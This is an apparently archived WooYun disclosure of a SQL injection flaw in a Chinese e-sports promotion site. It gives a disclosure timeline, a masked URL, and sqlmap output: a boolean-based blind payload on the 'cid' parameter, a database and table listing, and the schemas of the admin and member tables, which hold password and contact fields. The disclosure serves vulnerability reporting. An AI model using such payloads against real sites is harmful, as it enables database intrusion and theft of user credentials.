WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
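2015-12-22: Details reported to the vendor; awaiting vendor handling
2015-12-24: Vendor confirmed; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and experts in related fields
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public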
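This website was founded in the hope of becoming a cradle for promoting e-sports, so that game publishers and sponsors can more effectively achieve their publicity or promotional goals when holding tournaments or providing sponsorship,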
Issue URL: http://**.**.**.**/news/article.php?cid=4&id=3764
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cid (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cid=(SELECT (CASE WHEN (3305=3305) THEN 3305 ELSE 3305*(SELECT 3305 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&id=3764
---
web application technology: Apache
back-end DBMS: MySQL 5.0
current database: 'esports'
current user is DBA: False
available databases [2]:
[*] esports
[*] information_schema
Database: esports
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| live_viewer             | 12370   |
| news                    | 3378    |
| news_copy               | 3192    |
| news_1018               | 2973    |
| members                 | 583     |
| city_area               | 365     |
| p2p_video               | 250     |
| board_article_cate_copy | 238     |
| board_article_cate      | 236     |
| member_room_info        | 234     |
| p2p_video_copy          | 105     |
| board_respond_copy      | 72      |
| games_menu              | 65      |
| vod                     | 37      |
| board_cate              | 32      |
| contact                 | 32      |
| board_follower          | 31      |
| comments                | 30      |
| vod_copy                | 29      |
| live_follow             | 28      |
| vod_150205              | 28      |
| board_respond_re        | 24      |
| city                    | 23      |
| system_info             | 22      |
| board_respond           | 17      |
| products_categories     | 13      |
| board_article_copy      | 8       |
| categories              | 7       |
| qa                      | 7       |
| news_cate               | 6       |
| team_article_cate       | 6       |
| live_follow_copy        | 5       |
| products                | 5       |
| vod_cate                | 4       |
| comments_respond        | 3       |
| manager_copy            | 2       |
| manager                 | 1       |
| qa_cate                 | 1       |
+-------------------------+---------+
Table: manager
[11 columns]
+------------+-------------------+
| Column     | Type              |
+------------+-------------------+
| available  | enum('0','1','2') |
| country    | varchar(30)       |
| email      | varchar(128)      |
| fax        | varchar(30)       |
| id         | int(5)            |
| name       | varchar(64)       |
| password   | varchar(32)       |
| phone      | varchar(32)       |
| priv       | varchar(5)        |
| registDate | int(10)           |
| username   | varchar(16)       |
+------------+-------------------+

Database: esports
Table: members
[32 columns]
+---------------+-------------------+
| Column        | Type              |
+---------------+-------------------+
| address1      | varchar(250)      |
| address2      | varchar(250)      |
| birthday      | date              |
| channelinfo   | varchar(2000)     |
| channellogo   | varchar(100)      |
| channelname   | varchar(100)      |
| channeluimg   | varchar(250)      |
| chat_talk     | enum('0','1')     |
| check_way     | enum('1','2')     |
| chk_code      | varchar(20)       |
| chk_code_time | varchar(20)       |
| company       | varchar(100)      |
| country       | varchar(100)      |
| edu           | varchar(10)       |
| email         | varchar(250)      |
| fullname      | varchar(20)       |
| id            | int(11)           |
| income        | varchar(50)       |
| job           | varchar(50)       |
| mobile        | varchar(250)      |
| mobile_chk    | enum('0','1')     |
| msgbox        | tinyint(1)        |
| nickname      | varchar(250)      |
| password      | varchar(100)      |
| register_ip   | varchar(15)       |
| register_time | varchar(15)       |
| sid           | varchar(20)       |
| state         | enum('0','1','2') |
| tel           | varchar(25)       |
| uimg          | varchar(250)      |
| username      | varchar(250)      |
| zipcode       | varchar(5)        |
+---------------+-------------------+
Severity: High
Vulnerability Rank: 16
Confirmed at: 2015-12-24 18:42
Thank you for the report
None yet